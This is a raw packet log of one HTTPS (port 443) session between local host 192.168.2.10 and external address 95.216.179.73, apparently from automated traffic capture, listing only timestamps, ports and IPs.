Apr 4, 2024 17:49:37.685329914 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685376883 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685395002 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685401917 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685441971 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685451984 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685458899 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685477018 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685508966 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685513020 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685528994 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685549021 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685569048 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685583115 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685628891 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685673952 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685695887 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685708046 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685745001 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685754061 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685759068 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685770035 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685786009 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685817957 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685821056 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685837030 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685862064 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685873985 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685887098 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685937881 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685952902 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685956955 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.685971975 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686024904 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686024904 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686024904 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686032057 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686089039 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686100960 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686161995 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686181068 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686191082 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686197996 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686244011 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686275005 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686279058 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686289072 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686311007 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686343908 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686348915 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686371088 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686392069 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686407089 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686459064 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686471939 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686471939 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686475992 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686491966 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686531067 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686531067 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686537027 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686558962 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686573982 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686582088 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686587095 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686603069 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686629057 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686655045 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686657906 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686676979 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686686039 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686697960 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686738968 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686743021 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686778069 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686794043 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686806917 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686810970 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686827898 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686860085 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686871052 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686899900 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686914921 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.686928034 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.686949968 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687019110 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687024117 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687048912 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687064886 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687077045 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687092066 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687143087 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687165976 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687170029 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687227964 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687227964 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687227964 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687248945 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687271118 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687320948 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687325001 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687372923 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687386990 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687422037 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687426090 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687475920 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687513113 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687525988 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687537909 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687553883 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687561989 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687586069 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687627077 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687632084 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687638998 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687655926 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687688112 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687691927 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687722921 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687741041 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687747002 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687762022 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687832117 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687832117 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687835932 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687856913 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687872887 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687890053 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687894106 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687908888 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687948942 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687963009 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.687966108 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.687978029 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688035965 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688035965 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688040972 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688066959 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688077927 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688081026 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688102007 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688142061 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688142061 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688149929 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688177109 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688191891 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688235998 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688235998 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688242912 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688271046 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688302040 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688364029 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688390017 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688421011 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688425064 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688461065 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688477993 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688477993 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688491106 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688498974 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688504934 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688522100 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688560009 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688575029 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688589096 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688652992 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688657045 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688678980 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688698053 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688750029 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688760996 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688760996 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688767910 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688783884 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688824892 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688831091 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688863039 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.688885927 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688885927 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.688951015 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689287901 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689292908 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689305067 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689415932 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689420938 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689441919 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689462900 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689472914 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689476967 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689495087 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689515114 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689529896 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689553022 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689569950 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689599037 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689604044 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689635038 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689671040 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689685106 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689688921 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689719915 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689722061 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689754009 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689759016 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689800978 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689800978 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689831018 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689848900 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689920902 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689930916 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.689935923 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689955950 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.689986944 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.690001965 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.690038919 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.690058947 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.690073013 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.690080881 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.690110922 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.690124989 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.690136909 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.690160036 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.690170050 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.690175056 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.690191984 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.690229893 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.692840099 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.692955017 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.694823980 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.694828987 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.694983006 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.696384907 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.696419001 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.696449995 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.696456909 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.696511030 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.696511030 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.697002888 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.700555086 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.704200983 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.704226017 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.704268932 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.704273939 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.704303026 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.704350948 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.711039066 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.711071968 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.711112022 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.711117029 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.711169958 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.711169958 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.718852043 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.718880892 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.718960047 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.718960047 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.718976974 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.719089985 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.726633072 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.726650953 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.726775885 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.726780891 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.726860046 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.731517076 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.731535912 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.731595993 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.731600046 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.731650114 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.731650114 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.739430904 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.739448071 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.739509106 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.739511967 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.739553928 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.739553928 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.746304989 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.746335030 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.746424913 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.746424913 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.746434927 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.746534109 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.754374027 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.754391909 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.754477978 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.754482985 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.754527092 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.760003090 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.760020018 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.760103941 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.760103941 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.760111094 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.760170937 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.764894009 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.764913082 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.764970064 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.764976978 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.765017986 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.765017986 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.772047043 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.772066116 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.772150993 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.772156954 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.772180080 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.772308111 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.780505896 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.780543089 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.780590057 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.780594110 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.780647039 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.780647039 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.788538933 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.788557053 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.788650990 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.788655996 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.788682938 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.788717985 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.794671059 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.794709921 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.794778109 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.794790030 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.794805050 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.794971943 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.802254915 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.802309990 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.802359104 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.802371025 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.802395105 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.803590059 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.810786963 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.810821056 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.810889959 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.810899973 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.810950041 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.810950041 CEST	49784	443	192.168.2.10	95.216.179.73
